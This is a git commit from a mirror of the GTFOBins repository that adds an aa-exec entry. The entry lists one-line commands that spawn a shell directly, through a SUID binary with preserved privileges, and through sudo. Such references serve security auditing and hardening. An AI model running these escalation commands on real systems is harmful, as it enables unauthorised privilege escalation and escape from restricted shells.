1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-07 08:11:34 +01:00

Add aa-exec

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
n0tr00t 2023-03-20 17:11:34 +00:00 committed by GitHub
parent 15f69868f6
commit a59b182003
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/aa-exec Normal file

@ -0,0 +1,9 @@
---
functions:
shell:
- code: aa-exec /bin/sh
suid:
- code: ./aa-exec /bin/sh -p
sudo:
- code: sudo aa-exec /bin/sh
---